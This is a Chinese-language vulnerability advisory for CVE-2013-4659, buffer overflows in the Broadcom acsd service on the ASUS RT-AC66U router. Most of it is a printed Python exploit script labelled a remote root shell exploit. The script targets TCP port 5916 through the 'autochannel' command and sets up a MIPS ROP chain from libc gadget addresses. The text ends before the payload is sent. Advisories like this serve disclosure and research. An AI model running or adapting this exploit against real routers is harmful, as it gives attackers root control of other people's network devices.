发布日期:2013-07-29
更新日期:2013-07-31
受影响系统:
Asus RT-AC66U
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 61499
CVE(CAN) ID: CVE-2013-4659
ASUS RT-AC66U是第5代双频Wi-Fi 路由器,同时也是华硕AiCloud 服务的发射平台。
ASUS RT-AC66U包含存在多个缓冲区溢出漏洞的Broadcom ACSD二进制文件,可使远程攻击者利用任一漏洞以root权限执行任意代码。
<*来源:Jacob Holcomb/Gimppy
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env python
import signal, struct
from time import sleep
from socket import *
from sys import exit, exc_info
#
# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
# Discovered and Reported*June 2013
# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
# *Security Analsyts @ Independent Security Evaluators
# Software Vendor*********
# Exploit/Advisory********,
# Software****************acsd wireless service (Listens on TCP/5916)
# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable)
# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
#
# Overview:
# The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple
# Buffer Overflow attacks.
#
# Multiple overflows exist in the following software:
#
# - Broadcom acsd - Wireless Channel Service (autochannel¶m, autochannel&data, csscan&ifname commands)
#
def sigHandle(signum, frm): # Signal handler
print "\n[!!!] Cleaning up the exploit... [!!!]\n"
sleep(1)
exit(0)
def targServer():
while True:
try:
server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"))
server = inet_ntoa(server)
break
except:
print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
sleep(1)
continue
return server
def main():
print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
[*] Discovered and Reported: June 2013
[*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE
[*] Software Vendor:
[*] Exploit/Advisory: ,
[*] Software: acsd wireless service (Listens on TCP/5916)
[*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)
[*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""")
signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
victim = targServer()
port = int(5916)
acsdCmd = "autochannel¶m=" #Vulnerable command - JH
# base address of .text section of libc.so.0 in acsd's address space
libc_base = 0x2ab25000
# ROP gadget #1
# lui s0,0x2
# li a0,1
# move t9,s1
# jalr t9
# ori a1,s0,0x2
ra1 = struct.pack("<L", libc_base + 0x2d39c)
# ROP gadget #2
# move t9,s3
# lw ra,44(sp)
# lw s4,40(sp)
# lw s3,36(sp)
# lw s2,32(sp)
# lw s1,28(sp)
# lw s0,24(sp)
# jr t9
s1 = struct.pack("<L", libc_base + 0x34358)
# sleep() - used to force program context switch (cache flush)
s3 = struct.pack("<L", libc_base + 0x2cb90)
# ROP gadget #3
# addiu a1,sp,24
# lw gp,16(sp)
# lw ra,32(sp)
# jr ra
# addiu sp,sp,40
ra2 = struct.pack("<L", libc_base + 0xa1b0)